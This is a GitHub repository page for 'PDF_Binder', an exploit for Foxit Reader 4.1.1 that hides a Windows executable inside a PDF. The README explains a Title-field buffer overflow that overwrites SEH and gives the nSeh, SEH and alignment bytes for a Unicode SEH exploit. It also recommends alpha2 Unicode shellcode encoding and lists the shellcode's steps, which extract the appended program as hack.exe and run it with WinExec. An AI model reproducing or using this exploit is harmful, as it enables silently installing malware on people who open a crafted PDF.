Skip to content

cnStevenYu/PDF_Binder

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 
 
 

Repository files navigation

PDF_Binder

PDF_Binder(foxit reader4.1.1 exploit) PDF捆绑器,可捆绑win平台下的任何可执行程序。
漏洞描述:如果PDF文件的Title字段过长,Foxit Reader 4.1.1.805在读取Title字段时会发生缓冲区溢出。
原因:Title字段过长,Foxit Reader 4.1.1.805调用lstrcpyW函数的时候会发生缓冲区溢出从而覆盖掉SEH。
##Unicode-friendly SEH exploit: nSeh = "\x5A\x41" #0041005A are harmless instrs(venetian shellcode).
seh = "\x46\x6A" #006A0046 the addrs point to p/p/r instrs and it is harmless
align = "\x41\x61\x5C\x5C\x41\x61\x41\x54\x41\xC3" # Align finally make eip point to shellcode
###Control flow control flow ###Debug seh nSeh ##shellcode shellcode must be encoded to be unicode-compatible.
use alpha2 -unicode to create unicode-compatibe shellcode.
###shellcode的功能 1.通过GetCommandLine()获取文件名
2.打开pdf文件,读取最后8字节数据,取出exe的偏移值
3.读写文件,将附加在pdf文件后面的exe二进制码写到另一文件中(hack.exe)
4.调用WinExec执行exe

About

PDF_Binder(foxit reader4.1.1 exploit)

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published